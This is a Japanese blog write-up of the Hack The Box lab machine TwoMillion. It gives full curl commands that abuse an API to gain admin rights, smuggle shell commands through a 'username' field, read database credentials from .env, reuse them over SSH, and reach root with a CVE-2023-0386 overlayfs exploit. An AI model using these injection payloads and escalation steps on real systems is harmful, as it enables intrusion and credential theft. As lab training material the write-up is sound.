Writeup | Hack the Box: TwoMillion - Trance Shift 8

app.hackthebox.com

Guided mode 使用
Retired Free Machine

間がだいぶ空いたのでちょっとリハビリがてら

nmap

└─$ nmap 10.10.11.221
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-07 09:36 JST
Nmap scan report for 10.10.11.221
Host is up (0.25s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 666.89 seconds

Webサーバー

~/dev/hack 🐶💭❯ curl --verbose http://10.10.11.221
*   Trying 10.10.11.221:80...
* Connected to 10.10.11.221 (10.10.11.221) port 80
...
< HTTP/1.1 301 Moved Permanently
< Server: nginx
...
< Location: http://2million.htb/

リダイレクトかかってる 2million.htb というホストを想定してそう

~/dev/hack 🐶💭❯ cat /etc/hosts | tail -n 1
10.10.11.221 2million.htb

色々調整面倒なのでhostsに書いた

ホスト外からのアクセスにリダイレクトかけてるだけっぽい

/invite から登録

/js/inviteapi.min.js

ちょっとトリッキーだけどevalで組み立てられてるグローバルに展開されてるっぽいのでブラウザのコンソールで打てる

makeInviteCode()
undefined
Object { 0: 200, success: 1, data: {…}, hint: "Data is encrypted ... We should probbably check the encryption type in order to decrypt it..." }

makeInviteCode() だと思う。

In order to generate the invite code, make a POST request to /api/v1/invite/generate

~/dev/hack 🐶💭❯ curl -X POST http://2million.htb/api/v1/invite/generate
{"0":200,"success":1,"data":{"code":"RjIxNkktMzRaRkwtTVFBTUQtMjFMQTg=","format":"encoded"}}%

たぶんBASE64 => Cyberchefとかでデコードして F216I-34ZFL-MQAMD-21LA8

ログイン後、Connection Packを探す。たぶんVPNの話なので探すとAccessの中にあった

GET /api/v1/user/vpn/generate

http://2million.htb/api/v1 を見るとうっかりAPIがJSONでまとまっており、その中に admin 関連のものもある

PUT /api/v1/admin/settings/update    "Update user settings"

これが怪しいが、まずauth周りを調べる

GET /api/v1/user/auth
GET /api/v1/admin/auth

user/authを参考にadmin/authの挙動を探る。セッションはCookieっぽいので、

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/user/auth
{"loggedin":true,"username":"skyriser","is_admin":0}
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/auth
{"message":false}

それっぽいリクエストを投げる

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/settings/update -XPUT -H 'Content-Type: application/json' -d '{"username":"skyriser","is_admin":"1"}' --verbose
...
* Connection #0 to host 2million.htb left intact
{"status":"danger","message":"Missing parameter: email"}

JSONでリクエスト受け付けてるっぽい。とりあえずadminにしちゃう

adminで色々やってみるが、関係ない気がする

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/settings/update -XPUT -H 'Content-Type: application/json' -d '{"username":"skyriser","is_admin":1,"email":"skyriser@example.com"}' --verbose
{"id":15,"username":"skyriser","is_admin":1}
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" http://2million.htb/api/v1/admin/auth
{"message":true}

あと試してないのはこれ。

POST /api/v1/admin/vpn/generate Generate VPN for specific user

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin"}'
...

普通に他人のOpenVPNがダウンロード出来るけど、ディレクトリトラバーサル問題っぽいからusernameに細工すれば悪いことできそう

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;ls;"}'
Database.php
Router.php
VPN
assets
controllers
css
fonts
images
index.php
js
views

出来た。

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;whoami;"}'
www-data
$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;ls -la;"}'
total 56
drwxr-xr-x 10 root root 4096 Jun  8 02:40 .
drwxr-xr-x  3 root root 4096 Jun  6  2023 ..
-rw-r--r--  1 root root   87 Jun  2  2023 .env
-rw-r--r--  1 root root 1237 Jun  2  2023 Database.php
-rw-r--r--  1 root root 2787 Jun  2  2023 Router.php
drwxr-xr-x  5 root root 4096 Jun  8 02:40 VPN
drwxr-xr-x  2 root root 4096 Jun  6  2023 assets
drwxr-xr-x  2 root root 4096 Jun  6  2023 controllers
drwxr-xr-x  5 root root 4096 Jun  6  2023 css
drwxr-xr-x  2 root root 4096 Jun  6  2023 fonts
drwxr-xr-x  2 root root 4096 Jun  6  2023 images
-rw-r--r--  1 root root 2692 Jun  2  2023 index.php
drwxr-xr-x  3 root root 4096 Jun  6  2023 js
drwxr-xr-x  2 root root 4096 Jun  6  2023 views

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;ls -la /home/admin;"}'
total 32
drwxr-xr-x 4 admin admin 4096 Jun  7 14:18 .
drwxr-xr-x 3 root  root  4096 Jun  6  2023 ..
lrwxrwxrwx 1 root  root     9 May 26  2023 .bash_history -> /dev/null
-rw-r--r-- 1 admin admin  220 May 26  2023 .bash_logout
-rw-r--r-- 1 admin admin 3771 May 26  2023 .bashrc
drwx------ 2 admin admin 4096 Jun  6  2023 .cache
-rw------- 1 admin admin    0 Jun  7 14:18 .lesshsQ
-rw-r--r-- 1 admin admin  807 May 26  2023 .profile
drwx------ 2 admin admin 4096 Jun  6  2023 .ssh
-rw-r----- 1 root  admin   33 Jun  7 08:54 user.txt

user.txtはwww-dataからはアクセス出来ないようになってる。

ヒントは .env

$ curl -b "PHPSESSID=q6hg3iq5ph49gbcnambvmuel77" -XPOST http://2million.htb/api/v1/admin/vpn/generate -H 'Content-Type: application/json' -d '{"username":"admin;cat .env;"}'
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123

user.txt

SSHは空いているので、↑のパスワード試してみる

$ ssh admin@2million.htb
admin@2million.htb's password: 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.15.70-051570-generic x86_64)

admin@2million:~$ cat user.txt 
XXX

バッチリ入れてしまった。なるほどね。

メール周りを見る

次のヒントは

What is the email address of the sender of the email sent to admin?

メールスプールを見てみる

admin@2million:/var/spool/mail$ ls
admin
admin@2million:/var/spool/mail$ pwd
/var/spool/mail
...
Subject: Urgent: Patch System OS
...
There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty.

脆弱性あるよって言ってる。

CVE-2023-0386
- CVE-2023-0386 A Linux kernel bug in overlayfs - vsociety

これっぽいなー。privilege escalationって書いてあるし。

Priviledge Escalationする

github.com

このあたりを使わせて貰う

$ scp CVE-2023-0386-main.zip admin@2million.htb:/home/admin/
admin@2million.htb's password: 
CVE-2023-0386-main.zip                     100%   11KB  30.6KB/s   00:00

admin@2million:~$ ls
CVE-2023-0386-main.zip  user.txt
admin@2million:~$ unzip CVE-2023-0386-main.zip 
Archive:  CVE-2023-0386-main.zip
acc49811a9083381c28db9ec296774e6a82be419
   creating: CVE-2023-0386-main/
  inflating: CVE-2023-0386-main/Makefile  
  inflating: CVE-2023-0386-main/README.md  
  inflating: CVE-2023-0386-main/exp.c  
  inflating: CVE-2023-0386-main/fuse.c  
  inflating: CVE-2023-0386-main/getshell.c  
   creating: CVE-2023-0386-main/ovlcap/
 extracting: CVE-2023-0386-main/ovlcap/.gitkeep  
   creating: CVE-2023-0386-main/test/
  inflating: CVE-2023-0386-main/test/fuse_test.c  
  inflating: CVE-2023-0386-main/test/mnt  
  inflating: CVE-2023-0386-main/test/mnt.c

# Term 1
dmin@2million:~/CVE-2023-0386-main$ ./fuse ./ovlcap/lower ./gc
[+] len of gc: 0x3ee0
[+] readdir
...

# Term 2
admin@2million:~/CVE-2023-0386-main$ ./exp
uid:1000 gid:1000
[+] mount success
total 8
drwxrwxr-x 1 root   root     4096 Jun  8 03:17 .
drwxrwxr-x 6 root   root     4096 Jun  8 03:17 ..
-rwsrwxrwx 1 nobody nogroup 16096 Jan  1  1970 file
[+] exploit success!
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@2million:~/CVE-2023-0386-main# whoami
root

やったね

root.txt

root@2million:~# cd /root/
root@2million:/root# pwd
/root
root@2million:/root# ls
root.txt  snap  thank_you.json
root@2million:/root# cat root.txt 
XXX

Trance Shift 8 - Tech

CTFのWriteup書いていくメモ。

Writeup | Hack the Box: TwoMillion